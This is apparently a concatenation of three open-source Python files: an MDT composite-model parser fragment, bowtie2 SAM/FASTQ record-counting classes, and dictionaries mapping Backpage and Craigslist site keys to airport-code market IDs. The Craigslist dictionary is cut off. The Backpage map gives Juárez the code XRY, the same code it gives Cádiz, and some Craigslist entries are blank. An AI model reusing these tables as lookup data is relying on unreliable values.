    for compartment in compartments:
        for func in compartment.get_extra_sampling_maps_funcs():
            funcs.append(get_wrapped_func(compartment.name, func))

    return funcs
class CompartmentContextResults(collections.abc.Mapping):
    """Read-only mapping exposing one compartment's results under relative keys.

    This wraps the full results dictionary and exposes only the entries belonging
    to the given compartment, with the ``<compartment>.`` prefix stripped from the
    keys, so item access and iteration agree.

    Fixes over the previous version: the base class is ``collections.abc.Mapping``
    (the ``collections.Mapping`` alias was removed in Python 3.10), ``__iter__``
    returns a real iterator (it used to return a list, making ``for`` raise
    ``TypeError``), and the iterated keys are relative so that ``items()``,
    ``values()`` and ``dict(...)`` work.

    Args:
        compartment_name (str): the name of the compartment we are making things relative for
        input_results (dict): the original input we want to make relative
    """

    def __init__(self, compartment_name, input_results):
        self._compartment_name = compartment_name
        self._input_results = input_results
        prefix = self._compartment_name + '.'
        # store the keys relative to the compartment so iteration matches __getitem__
        self._valid_keys = [key[len(prefix):] for key in self._input_results if key.startswith(prefix)]

    def __getitem__(self, key):
        return self._input_results['{}.{}'.format(self._compartment_name, key)]

    def __len__(self):
        return len(self._valid_keys)

    def __iter__(self):
        # must return an iterator, not the underlying list
        return iter(self._valid_keys)
def parse_composite_model_expression(model_expression):
    """Parse the given model expression into a suitable model tree.

    Args:
        model_expression (str): the model expression string. Example::

            model_expression = '''
                S0 * ( (Weight(Wball) * Ball) +
                       (Weight(Wstick) * Stick ) )
            '''

        If the model name is followed by parenthesis the string in parenthesis will represent the model's nickname.

    Returns:
        :class:`list`: the compartment model tree for use in composite models.
    """
    class Semantics:

        def expr(self, ast):
            # a binary node parses as [lhs, op, rhs]; reorder to (lhs, rhs, op)
            if isinstance(ast, (list, tuple)):
                return ast[0], ast[2], ast[1]
            return ast

        def term(self, ast):
            # same reordering as expr(); the previous version only handled 'list'
            # here while accepting tuples above, letting tuples through unreordered
            if isinstance(ast, (list, tuple)):
                return ast[0], ast[2], ast[1]
            return ast

        def factor(self, ast):
            # a parenthesized group parses as ['(', expr, ')']; unwrap it
            if isinstance(ast, (list, tuple)):
                return ast[1]
            return ast

        def model(self, ast):
            # bare name -> default instance; with parenthesis, ast[2] is the nickname
            if isinstance(ast, str):
                return get_component('compartment_models', ast)()
            return get_component('compartment_models', ast[0])(ast[2])

    return _composite_model_expression_parser.parse(model_expression, semantics=Semantics())
| cbclab/MDT | mdt/component_templates/composite_models.py | Python | lgpl-3.0 | 21,871 | [
"Gaussian"
] | 513f0e7babcfaea9739fb6ecb7532476bbcec981a58fcd916a53cd22eae970f9 |
#!/usr/bin/env python
import os
import logging
class DataFace(object):
    """Abstract interface for data sources bowtie can operate on."""

    def size(self):
        """Return the number of records in this data source.

        Subclasses must override this method.
        """
        raise NotImplementedError("size() needs to be implemented!")
class SamFile(DataFace):
    """A SAM alignment file data source.

    Args:
        sam_desc (str): path to the SAM file.
    """

    def __init__(self, sam_desc):
        self.file_desc = sam_desc

    def size(self):
        """Return the number of alignment records (non-'@' header lines).

        The count is computed once and cached on the instance as ``no_frags``.
        Raises OSError if the file cannot be read.
        """
        if hasattr(self, 'no_frags'):
            return self.no_frags
        try:
            # context manager guarantees the handle is closed on any outcome,
            # replacing the previous manual close() in a bare except block
            with open(self.file_desc, "r") as fh:
                count = sum(1 for line in fh if line[0] != "@")
        except OSError:
            logging.error("Exception reading sam file!")
            raise
        self.no_frags = count
        return count
class FastaQFile(DataFace):
    """A FASTQ sequence file data source.

    Args:
        fastq_desc (str): path to the FASTQ file.
    """

    def __init__(self, fastq_desc):
        self.file_desc = fastq_desc

    def size(self):
        """Return the number of sequence records in the FASTQ file.

        The count is computed once and cached on the instance as ``no_seqs``.
        Raises TypeError if the file does not follow the 4-line FASTQ record
        layout ('@' header on line 1, '+' separator on line 3), or OSError if
        the file cannot be read.
        """
        if hasattr(self, 'no_seqs'):
            return self.no_seqs
        count = 0
        try:
            # context manager guarantees the handle is closed on any outcome,
            # replacing the previous manual close() in a bare except block
            with open(self.file_desc, "r") as fh:
                for lno, line in enumerate(fh):
                    record_line = lno % 4
                    if record_line == 0:
                        if line[0] != '@':
                            raise TypeError("This does not look like a fastq file!")
                        count += 1
                    elif record_line == 2 and line[0] != '+':
                        raise TypeError("This does not look like a fastq file!")
        except (OSError, TypeError):
            # preserve the original behavior of logging both read failures
            # and malformed-file errors before re-raising
            logging.error("Exception reading fastq file!")
            raise
        self.no_seqs = count
        return self.no_seqs
| iml/bowtie2 | scripts/test/dataface.py | Python | gpl-3.0 | 1,769 | [
"Bowtie"
] | 31ee5da6abe27dd437fded11357a9a3b1a19e0f9a84d31e008f2712b93256c69 |
#!/usr/bin/python
# backpage_sitekey_to_marketid
backpage_sitekey_to_marketid = {
"abbotsford": "YXX",
"aberdeen": "ABZ",
"abilene": "ABI",
"acapulco": "ACA",
"adelaide": "ADL",
"ahmedabad": "AMD",
"akroncanton": "CAK",
"alabama": "BHM",
"albany": "ALB",
"albanyga": "ABY",
"alberta": "YEG",
"albuquerque": "ABQ",
"alexandria": "ESF",
"alicante": "ALC",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"amsterdam": "AMS",
"anchorage": "ANC",
"annapolis": "ANP",
"annarbor": "ARB",
"appleton": "ATW",
"arizona": "PHX",
"arkansas": "LIT",
"arlington": "DFW",
"asheville": "AVL",
"ashtabula": "HZY",
"athensga": "AHN",
"athensoh": "ATO",
"athina": "ATH",
"atlanta": "ATL",
"auburn": "AUO",
"auckland": "AKL",
"augusta": "AGS",
"austin": "AUS",
"bahamas": "NAS",
"bahia": "SSA",
"bajasur": "SJD",
"bakersfield": "BFL",
"baleares": "PMI",
"balgariya": "SOF",
"baltimore": "BWI",
"bangalore": "BLR",
"bangladesh": "DAC",
"barcelona": "BCN",
"barrie": "QEB",
"basel": "BSL",
"batonrouge": "BTR",
"battlecreek": "AZO",
"beaumont": "BPT",
"beijing": "PEK",
"belfast": "BFS",
"belleville": "YTR",
"bellingham": "BLI",
"belohorizonte": "CNF",
"bemidji": "BJI",
"bend": "RDM",
"berlin": "TXL",
"bern": "BRN",
"bhubaneswar": "BBI",
"bigisland": "KOA",
"bilbao": "BIO",
"biloxi": "GPT",
"binghamton": "BGM",
"birmingham": "BHM",
"birminghamuk": "BHX",
"bismarck": "BIS",
"blacksburg": "BCB",
"bloomington": "BMI",
"bloomingtonin": "BMG",
"boise": "BOI",
"bologna": "BLQ",
"boone": "NC06",
"bordeaux": "BOD",
"boston": "BOS",
"boulder": "WBU",
"bowlinggreen": "BWG",
"brantford": "YFD",
"brasilia": "BSB",
"bremen": "BRE",
"bretagne": "RNS",
"brighton": "ESH",
"brisbane": "BNE",
"bristol": "BRS",
"britishcolumbia": "YVR",
"bronx": "JFK",
"brooklyn": "JFK",
"brownsville": "BRO",
"brunswick": "BQK",
"brussel": "BRU",
"bucuresti": "OTP",
"budapest": "BUD",
"buenosaires": "EZE",
"buffalo": "BUF",
"burlington": "BTV",
"cadiz": "XRY",
"calabria": "REG",
"calgary": "YYC",
"cambridge": "CBG",
"canarias": "TFS",
"canberra": "CBR",
"capecod": "PVC",
"capetown": "CPT",
"caracas": "CCS",
"carbondale": "MDH",
"caribbean": "KIN",
"cariboo": "YXS",
"catskills": "20N",
"cedarrapids": "CID",
"centraljersey": "47N",
"centralmich": "LAN",
"chambana": "CMI",
"chambersburg": "N68",
"chandigarh": "IXC",
"charleston": "CHS",
"charlestonwv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chengdu": "CTU",
"chennai": "MAA",
"chesapeake": "ORF",
"chicago": "ORD",
"chico": "CIC",
"chihuahua": "CUU",
"chillicothe": "RZT",
"chongqing": "CKG",
"christchurch": "CHC",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"clovis": "CVN",
"collegestation": "CLL",
"colombia": "BOG",
"colorado": "DEN",
"coloradosprings": "COS",
"columbia": "CAE",
"columbiamo": "COU",
"columbus": "CMH",
"columbusga": "CSG",
"comoxvalley": "YQQ",
"connecticut": "HFD",
"cookeville": "SRB",
"cork": "ORK",
"cornwall": "YCC",
"corpuschristi": "CRP",
"corse": "AJA",
"corvallis": "CVO",
"costarica": "SJO",
"cranbrook": "YXC",
"cumberlandvalley": "CBE",
"curitiba": "CWB",
"dalian": "DLC",
"dallas": "DFW",
"danville": "DAN",
"darwin": "DRW",
"dayton": "DAY",
"daytona": "DAB",
"dc": "IAD",
"decatur": "DEC",
"delaware": "ILG",
"delhi": "DEL",
"delrio": "DRT",
"denhaag": "RTM",
"denton": "DFW",
"denver": "DEN",
"derry": "LDY",
"desmoines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dom-tom": "PTP",
"dominican": "SDQ",
"dothan": "DHN",
"dresden": "DRS",
"dubai": "DXB",
"dublin": "DUB",
"dubuque": "DBQ",
"duesseldorf": "DUS",
"duluth": "DLH",
"dunedin": "DUD",
"durban": "DUR",
"eastanglia": "NWI",
"eastbay": "OAK",
"easternnc": "PGV",
"easternshore": "SBY",
"eastidaho": "IDA",
"eastky": "PBX",
"eastmidlands": "EMA",
"eastoregon": "PDT",
"eauclaire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"eindhoven": "EIN",
"elko": "EKO",
"elmira": "ELM",
"elpaso": "ELP",
"elsalvador": "SAL",
"erie": "ERI",
"essen": "ESS",
"eugene": "EUG",
"evansville": "EVV",
"everett": "PAE",
"fairfield": "BDR",
"fargo": "FAR",
"farmington": "FMN",
"faro-algarve": "FAO",
"fayetteville": "XNA",
"fayettevillenc": "FAY",
"fingerlakes": "D82",
"firenze": "FLR",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLO",
"forli-cesena": "FRL",
"fortaleza": "FOR",
"fortcollins": "FNL",
"fortdodge": "FOD",
"fortmyers": "RSW",
"fortsmith": "FSM",
"fortwayne": "FWA",
"fortworth": "DFW",
"frankfurt": "FRA",
"frederick": "FDK",
"fredericksburg": "EZF",
"fresno": "FAT",
"ftlauderdale": "FLL",
"ftmcmurray": "YMM",
"fukuoka": "FUK",
"gadsden": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"genf": "GVA",
"genova": "GOA",
"georgia": "ATL",
"glasgow": "GLA",
"glensfalls": "GFL",
"goa": "GOI",
"granada": "GRX",
"grandforks": "GFK",
"grandisland": "GRI",
"grandrapids": "GRR",
"greenbay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"grenoble": "GNB",
"guadalajara": "GDL",
"guam": "GUM",
"guanajuato": "BJX",
"guangzhou": "CAN",
"guatemala": "GUA",
"guelph": "CNC4",
"haifa": "HFA",
"halifax": "YHZ",
"hamburg": "HAM",
"hamilton": "YHM",
"hampshire": "SOU",
"hampton": "ORF",
"hangzhou": "HGH",
"hannover": "HAJ",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hawaii": "HNL",
"heidelberg": "HDB",
"helsinki": "HEL",
"hermosillo": "HMO",
"hickory": "HKY",
"hiltonhead": "HHH",
"hiroshima": "HIJ",
"hobart": "HBA",
"holland": "BIV",
"hongkong": "HKG",
"honolulu": "HNL",
"houma": "HUM",
"houston": "IAH",
"hudsonvalley": "SWF",
"humboldt": "ACV",
"huntington": "HTS",
"huntingtonoh": "HTS",
"huntsville": "HSV",
"huntsvilletx": "UTS",
"hyderabad": "HYD",
"iceland": "RKV",
"idaho": "BOI",
"illinois": "ORD",
"imperial": "IPL",
"indiana": "IND",
"indianapolis": "IND",
"indore": "IDR",
"inlandempire": "ONT",
"iowa": "DSM",
"iowacity": "IOW",
"istanbul": "IST",
"ithaca": "ITH",
"jackson": "JAN",
"jacksonmi": "JXN",
"jacksonville": "OAJ",
"jaipur": "JAI",
"jakarta": "CGK",
"jamaica": "KIN",
"janesville": "JVL",
"jerseyshore": "ACY",
"jerusalem": "JRS",
"johannesburg": "JNB",
"jonesboro": "JBR",
"joplin": "JLN",
"juarez": "XRY",
"kaiserslautern": "RMS",
"kalamazoo": "AZO",
"kamloops": "YKA",
"kansas": "FOE",
"karlsruhe": "FKB",
"kauai": "LIH",
"kc": "MCI",
"kelowna": "YLW",
"kentucky": "SDF",
"kerala": "TRV",
"keys": "EYW",
"kiel": "KEL",
"killeen": "GRK",
"kingston": "YGK",
"kirksville": "IRK",
"kitchener": "YKF",
"klamath": "LMT",
"knoxville": "TYS",
"kobenhavn": "CPH",
"koeln": "CGN",
"kokomo": "OKK",
"kolkata": "CCU",
"lacrosse": "LSE",
"lafayette": "LFT",
"lakecharles": "LCH",
"lakeland": "LAL",
"lancaster": "LNS",
"lansing": "LAN",
"lapaz": "LPB",
"laredo": "LRD",
"lasalle": "VYS",
"lascruces": "LRU",
"lasvegas": "LAS",
"lausanne": "QLS",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"leipzig": "LEJ",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lille": "LIL",
"lima": "LIM",
"limaoh": "AOH",
"limerick": "SNN",
"lincoln": "LNK",
"lisboa": "LIS",
"lisburn": "BFS",
"littlerock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"loire": "NTE",
"london": "LHR",
"londonon": "YXU",
"longbeach": "LGB",
"longisland": "ISP",
"losangeles": "LAX",
"louisiana": "MSY",
"louisville": "SDF",
"loz": "AIZ",
"lubbock": "LBB",
"lucknow": "LKO",
"luebeck": "LBC",
"luxembourg": "LUX",
"lynchburg": "LYH",
"lyon": "LYS",
"macon": "MCN",
"madison": "MSN",
"madrid": "MAD",
"maine": "PWM",
"malaga": "AGP",
"malaysia": "KUL",
"malta": "MLA",
"managua": "MGA",
"manchester": "MAN",
"manhattan": "JFK",
"manhattanks": "MHK",
"mankato": "MKT",
"mannheim": "MHG",
"mansfield": "MFD",
"marseille": "MRS",
"martinsburg": "MRB",
"maryland": "BWI",
"masoncity": "MCW",
"massachusetts": "BOS",
"mattoon": "MTO",
"maui": "OGG",
"mazatlan": "MZT",
"mcallen": "MFE",
"meadville": "GKJ",
"medford": "MFR",
"medicinehat": "YXH",
"melbourne": "MEL",
"memphis": "MEM",
"mendocino": "UKI",
"merced": "MCE",
"meridian": "MEI",
"mexicocity": "MEX",
"miami": "MIA",
"michigan": "DTW",
"milano": "MXP",
"milwaukee": "MKE",
"minneapolis": "MSP",
"minnesota": "MSP",
"minot": "MOT",
"mississippi": "JAN",
"missouri": "STL",
"mobile": "MOB",
"modesto": "MOD",
"mohave": "IGM",
"monroe": "MLU",
"monroemi": "TTF",
"montana": "HLN",
"monterey": "MRY",
"monterrey": "MTY",
"montevideo": "MVD",
"montgomery": "MGM",
"montpellier": "MPL",
"montreal": "YUL",
"morgantown": "MGW",
"morocco": "CMN",
"moseslake": "MWH",
"moskva": "SVO",
"mtvernon": "BVS",
"muenchen": "MUC",
"mumbai": "BOM",
"muncie": "MIE",
"muskegon": "MKG",
"myrtlebeach": "MYR",
"nagoya": "NGO",
"nanaimo": "YCD",
"nanjing": "NKG",
"napoli": "NAP",
"nashville": "BNA",
"natchez": "HEZ",
"nebraska": "OMA",
"nevada": "LAS",
"newbrunswick": "YQM",
"newcastle": "NCL",
"newhampshire": "MHT",
"newhaven": "HVN",
"newjersey": "EWR",
"newlondon": "GON",
"newmexico": "ABQ",
"neworleans": "MSY",
"newportnews": "ORF",
"newyork": "JFK",
"niagara": "YCM",
"nice": "NCE",
"nigeria": "LOS",
"norfolk": "ORF",
"normandie": "URO",
"northbay": "STS",
"northcarolina": "CLT",
"northdakota": "FAR",
"northernmichigan": "TVC",
"northjersey": "EWR",
"northmiss": "TUP",
"northplatte": "LBF",
"nova": "IAD",
"nuernberg": "NUE",
"nwct": "DXR",
"nwga": "RMG",
"oaxaca": "OAX",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"ohio": "CMH",
"okinawa": "OKA",
"oklahoma": "OKC",
"oklahomacity": "OKC",
"olympia": "TCM",
"omaha": "OMA",
"oneonta": "ONH",
"ontario": "YOW",
"orangecounty": "SNA",
"oregon": "PDX",
"oregoncoast": "ONP",
"orlando": "MCO",
"osaka-kobe-kyoto": "KIX",
"oslo": "OSL",
"ottawa": "YOW",
"ottumwa": "OTM",
"outerbanks": "FFA",
"owensboro": "OWB",
"owensound": "YOS",
"oxford": "OXF",
"pakistan": "KHI",
"palma": "PMI",
"palmdale": "PMD",
"palmsprings": "PSP",
"panama": "PAC",
"panamacity": "PFN",
"paris": "CDG",
"parkersburg": "PKB",
"peace": "YPE",
"pennstate": "UNV",
"pennsylvania": "PHL",
"pensacola": "PNS",
"peoria": "PIA",
"perth": "PER",
"perugia": "PEG",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"porthuron": "PHN",
"portland": "PDX",
"porto": "OPO",
"portoalegre": "POA",
"portsmouth": "ORF",
"potsdam": "PTD",
"praha": "PRG",
"prescott": "PRC",
"pretoria": "PRY",
"princegeorge": "YXS",
"providence": "PVD",
"provo": "PVU",
"puebla": "PBC",
"pueblo": "PUB",
"puertorico": "SJU",
"pullman": "PUW",
"pune": "PNQ",
"pv": "PVR",
"quadcities": "MLI",
"quebec": "YUL",
"quebeccity": "YQB",
"queens": "JFK",
"quincy": "UIN",
"quito": "UIO",
"racine": "RAC",
"raleigh": "RDU",
"reading": "RDG",
"recife": "REC",
"reddeer": "YQF",
"redding": "RDD",
"regina": "YQR",
"reno": "RNO",
"richmond": "RIC",
"richmondin": "RID",
"riodejaneiro": "GIG",
"roanoke": "ROA",
"rochester": "ROC",
"rochestermn": "RST",
"rockford": "RFD",
"rockies": "EGE",
"roma": "FCO",
"roseburg": "RBG",
"rostock": "RLG",
"roswell": "ROW",
"rotterdam": "RTM",
"sacramento": "SMF",
"saginaw": "MBS",
"saguenay": "YBG",
"salem": "SLE",
"saltlakecity": "SLC",
"salvador": "SSA",
"sanantonio": "SAT",
"sandiego": "SAN",
"sandusky": "SKY",
"sanfernandovalley": "BUR",
"sangabrielvalley": "EMT",
"sanjose": "SJC",
"sankt-peterburg": "LED",
"sanluisobispo": "SBP",
"sanmarcos": "HYI",
"sanmateo": "SQL",
"santabarbara": "SBA",
"santacruz": "WVI",
"santafe": "SAF",
"santamaria": "SMX",
"santiago": "SCL",
"saopaulo": "GRU",
"sapporo": "CTS",
"sarasota": "SRQ",
"sardegna": "CAG",
"sarnia": "YZR",
"saskatchewan": "YQR",
"saskatoon": "YXE",
"sault": "YAM",
"savannah": "SAV",
"schwerin": "SZW",
"scottsbluff": "BFF",
"scranton": "AVP",
"seattle": "SEA",
"semo": "CGI",
"sendai": "SDJ",
"seoul": "ICN",
"sevilla": "SVQ",
"sf": "SFO",
"shanghai": "SHA",
"sheboygan": "SBM",
"sheffield": "DSA",
"shenyang": "SHE",
"shenzhen": "SZX",
"sherbrooke": "YSC",
"shoals": "MSL",
"showlow": "SOW",
"shreveport": "SHV",
"sicilia": "PMO",
"sierravista": "FHU",
"singapore": "SIN",
"siouxcity": "SUX",
"siskiyou": "SIY",
"skeena": "XCM",
"southbend": "SBN",
"southcarolina": "CAE",
"southcoast": "EWB",
"southdakota": "PIR",
"southernmaryland": "2W6",
"southernwestvirginia": "BKW",
"southjersey": "MIV",
"spacecoast": "TIX",
"spokane": "GEG",
"springfield": "CEF",
"springfieldil": "SPI",
"springfieldmo": "SGF",
"statenisland": "JFK",
"statesboro": "TBR",
"staugustine": "UST",
"stcloud": "STC",
"stgeorge": "SGU",
"stillwater": "SWO",
"stjohns": "YYT",
"stjoseph": "STJ",
"stlouis": "STL",
"stockholm": "ARN",
"stockton": "SCK",
"strasbourg": "SXB",
"stuttgart": "STR",
"sudbury": "YSB",
"suffolk": "ORF",
"sunshine": "YHS",
"surat": "STV",
"susanville": "SVE",
"swmi": "BEH",
"swva": "MKJ",
"sydney": "SYD",
"syracuse": "SYR",
"tacoma": "TCM",
"taipei": "TPE",
"tallahassee": "TLH",
"tampa": "TPA",
"telaviv": "TLV",
"tennessee": "BNA",
"terrehaute": "HUF",
"texarkana": "TXK",
"texoma": "GYI",
"thunderbay": "YQT",
"tijuana": "TIJ",
"tippecanoe": "LAF",
"tokyo": "NRT",
"toledo": "TOL",
"topeka": "FOE",
"torino": "TRN",
"toronto": "YYZ",
"toulouse": "TLS",
"treasurecoast": "VRB",
"tricities": "TRI",
"tricitieswa": "PSC",
"troisrivieres": "YRQ",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"tuscarawas": "PHD",
"twinfalls": "TWF",
"twintiers": "OLE",
"tyler": "TYR",
"ukraine": "IEV",
"up": "MQT",
"utah": "SLC",
"utica": "UCA",
"utrecht": "AMS",
"valdosta": "VLD",
"valencia": "VLC",
"vancouver": "YVR",
"venezia": "VCE",
"ventura": "OXR",
"veracruz": "VER",
"victoria": "YYJ",
"victoriatx": "VCT",
"virginia": "RIC",
"virginiabeach": "ORF",
"virginislands": "STT",
"visalia": "VIS",
"waco": "ACT",
"wales": "CWL",
"warszawa": "WAW",
"washington": "SEA",
"washingtondc": "IAD",
"waterford": "WAT",
"waterloo": "YKF",
"watertown": "ART",
"wausau": "AUW",
"wellington": "WLG",
"wenatchee": "EAT",
"westbank": "JRS",
"westchester": "HPN",
"westernmaryland": "CBE",
"westky": "PAH",
"westpalmbeach": "PBI",
"westslope": "GJT",
"westvirginia": "CRW",
"wheeling": "HLG",
"whistler": "YWS",
"whitehorse": "YXY",
"wichita": "ICT",
"wichitafalls": "SPS",
"wien": "VIE",
"williamsport": "IPT",
"wilmington": "ILM",
"windsor": "YQG",
"winnipeg": "YWG",
"winstonsalem": "INT",
"wisconsin": "MKE",
"worcester": "ORH",
"wuhan": "WUH",
"wyoming": "CPR",
"xian": "XIY",
"yakima": "YKM",
"yellowknife": "YZF",
"york": "THV",
"youngstown": "YNG",
"yucatan": "MID",
"yuma": "YUM",
"zanesville": "ZZV",
"zurich": "ZRH"}
# craigslist_sitekey_to_marketid
# Maps a Craigslist site key (the site's subdomain slug) to the IATA code of
# the market's primary airport, which this file uses as the market identifier.
# NOTE(review): a few sites map to "" (no airport assigned yet): "bend",
# "guelph", "jerusalem", "lausanne" — confirm downstream code tolerates an
# empty market id for these.
craigslist_sitekey_to_marketid = {
"abbotsford": "YXX",
"aberdeen": "ABZ",
"abilene": "ABI",
"acapulco": "ACA",
"accra": "ACC",
"addisababa": "ADD",
"adelaide": "ADL",
"ahmedabad": "AMD",
"akroncanton": "CAK",
"albany": "ALB",
"albanyga": "ABY",
"albuquerque": "ABQ",
"alicante": "ALC",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"ames": "AMW",
"amsterdam": "AMS",
"anchorage": "ANC",
"annapolis": "ANP",
"annarbor": "ARB",
"appleton": "ATW",
"asheville": "AVL",
"ashtabula": "HZY",
"athens": "ATH",
"athensga": "AHN",
"athensohio": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"auckland": "AKL",
"augusta": "AGS",
"austin": "AUS",
"bacolod": "BCD",
"baghdad": "BGW",
"bajasur": "SJD",
"bakersfield": "BFL",
"baleares": "PMI",
"baltimore": "BWI",
"bangalore": "BLR",
"bangkok": "BKK",
"bangladesh": "DAC",
"barcelona": "BCN",
"barrie": "QEB",
"basel": "BSL",
"bath": "BRS",
"batonrouge": "BTR",
"battlecreek": "AZO",
"beaumont": "BPT",
"beijing": "PEK",
"beirut": "BEY",
"belfast": "BFS",
"belleville": "YTR",
"bellingham": "BLI",
"belohorizonte": "CNF",
"bemidji": "BJI",
"bend": "",
"berlin": "TXL",
"bern": "BRN",
"bgky": "BWG",
"bham": "BHM",
"bhubaneswar": "BBI",
"bigbend": "ALE",
"bilbao": "BIO",
"billings": "BIL",
"binghamton": "BGM",
"birmingham": "BHX",
"bismarck": "BIS",
"blacksburg": "BCB",
"bloomington": "BMG",
"bn": "BMI",
"boise": "BOI",
"bologna": "BLQ",
"boone": "NC06",
"bordeaux": "BOD",
"boston": "BOS",
"boulder": "WBU",
"bozeman": "BZN",
"brainerd": "BRD",
"brantford": "YFD",
"brasilia": "BSB",
"bremen": "BRE",
"brighton": "ESH",
"brisbane": "BNE",
"bristol": "BRS",
"brownsville": "BRO",
"brunswick": "BQK",
"brussels": "BRU",
"bucharest": "OTP",
"budapest": "BUD",
"buenosaires": "EZE",
"buffalo": "BUF",
"bulgaria": "SOF",
"burlington": "BTV",
"butte": "BTM",
"cadiz": "XRY",
"cairns": "CNS",
"cairo": "CAI",
"calgary": "YYC",
"cambridge": "CBG",
"canarias": "TFS",
"canberra": "CBR",
"capecod": "PVC",
"capetown": "CPT",
"caracas": "CCS",
"carbondale": "MDH",
"cardiff": "CWL",
"caribbean": "KIN",
"cariboo": "YXS",
"casablanca": "CMN",
"catskills": "20N",
"cdo": "CGY",
"cebu": "CEB",
"cedarrapids": "CID",
"cenla": "ESF",
"centralmich": "LAN",
"cfl": "SEF",
"chambana": "CMI",
"chambersburg": "N68",
"chandigarh": "IXC",
"charleston": "CHS",
"charlestonwv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chengdu": "CTU",
"chennai": "MAA",
"chicago": "ORD",
"chico": "CIC",
"chihuahua": "CUU",
"chillicothe": "RZT",
"chongqing": "CKG",
"christchurch": "CHC",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"clovis": "CVN",
"cnj": "47N",
"collegestation": "CLL",
"cologne": "CGN",
"colombia": "BOG",
"columbia": "CAE",
"columbiamo": "COU",
"columbus": "CMH",
"columbusga": "CSG",
"comoxvalley": "YQQ",
"cookeville": "SRB",
"copenhagen": "CPH",
"cornwall": "YCC",
"corpuschristi": "CRP",
"corvallis": "CVO",
"cosprings": "COS",
"costarica": "SJO",
"cotedazur": "NCE",
"coventry": "CVT",
"cranbrook": "YXC",
"csd": "PIR",
"curitiba": "CWB",
"dalian": "DLC",
"dallas": "DFW",
"danville": "DAN",
"darwin": "DRW",
"davaocity": "DVO",
"dayton": "DAY",
"daytona": "DAB",
"decatur": "DEC",
"delaware": "ILG",
"delhi": "DEL",
"delrio": "DRT",
"denver": "DEN",
"derby": "EMA",
"desmoines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dothan": "DHN",
"dresden": "DRS",
"dubai": "DXB",
"dublin": "DUB",
"dubuque": "DBQ",
"duluth": "DLH",
"dundee": "DND",
"dunedin": "DUD",
"durban": "DUR",
"dusseldorf": "DUS",
"eastco": "LIC",
"easternshore": "SBY",
"eastidaho": "IDA",
"eastky": "PBX",
"eastmids": "EMA",
"eastnc": "PGV",
"eastoregon": "PDT",
"easttexas": "TYR",
"eauclaire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"elko": "EKO",
"elmira": "ELM",
"elpaso": "ELP",
"elsalvador": "SAL",
"enid": "END",
"erie": "ERI",
"essen": "ESS",
"essex": "STN",
"eugene": "EUG",
"evansville": "EVV",
"fairbanks": "FAI",
"fargo": "FAR",
"farmington": "FMN",
"faro": "FAO",
"fayar": "XNA",
"fayetteville": "FAY",
"fingerlakes": "D82",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLR",
"florencesc": "FLO",
"fortaleza": "FOR",
"fortcollins": "FNL",
"fortdodge": "FOD",
"fortlauderdale": "FLL",
"fortmyers": "RSW",
"fortsmith": "FSM",
"fortwayne": "FWA",
"frankfurt": "FRA",
"frederick": "FDK",
"fredericksburg": "EZF",
"fresno": "FAT",
"ftmcmurray": "YMM",
"fukuoka": "FUK",
"gadsden": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"geneva": "GVA",
"genoa": "GOA",
"glasgow": "GLA",
"glensfalls": "GFL",
"goa": "GOI",
"goldcoast": "OOL",
"goldcountry": "O22",
"granada": "GRX",
"grandforks": "GFK",
"grandisland": "GRI",
"grandrapids": "GRR",
"greatfalls": "GTF",
"greenbay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"grenoble": "GNB",
"guadalajara": "GDL",
"guanajuato": "BJX",
"guangzhou": "CAN",
"guatemala": "GUA",
"guelph": "",
"gulfport": "GPT",
"haifa": "HFA",
"halifax": "YHZ",
"hamburg": "HAM",
"hamilton": "YHM",
"hampshire": "SOU",
"hanford": "HJO",
"hangzhou": "HGH",
"hannover": "HAJ",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hat": "YXH",
"hattiesburg": "HBG",
"heidelberg": "HDB",
"helena": "HLN",
"helsinki": "HEL",
"hermosillo": "HMO",
"hickory": "HKY",
"hiltonhead": "HHH",
"hiroshima": "HIJ",
"hobart": "HBA",
"holland": "BIV",
"hongkong": "HKG",
"honolulu": "HNL",
"houma": "HUM",
"houston": "IAH",
"hudsonvalley": "SWF",
"humboldt": "ACV",
"huntington": "HTS",
"huntsville": "HSV",
"hyderabad": "HYD",
"iloilo": "ILO",
"imperial": "IPL",
"indianapolis": "IND",
"indore": "IDR",
"inlandempire": "ONT",
"iowacity": "IOW",
"istanbul": "IST",
"ithaca": "ITH",
"jackson": "JAN",
"jacksontn": "MKL",
"jacksonville": "JAX",
"jaipur": "JAI",
"jakarta": "CGK",
"janesville": "JVL",
"jerseyshore": "ACY",
"jerusalem": "",
"johannesburg": "JNB",
"jonesboro": "JBR",
"joplin": "JLN",
"juarez": "CJS",
"juneau": "JNU",
"jxn": "JXN",
"kaiserslautern": "RMS",
"kalamazoo": "AZO",
"kalispell": "FCA",
"kamloops": "YKA",
"kansascity": "MCI",
"kelowna": "YLW",
"kenai": "ENA",
"kent": "LYX",
"kenya": "NBO",
"kerala": "TRV",
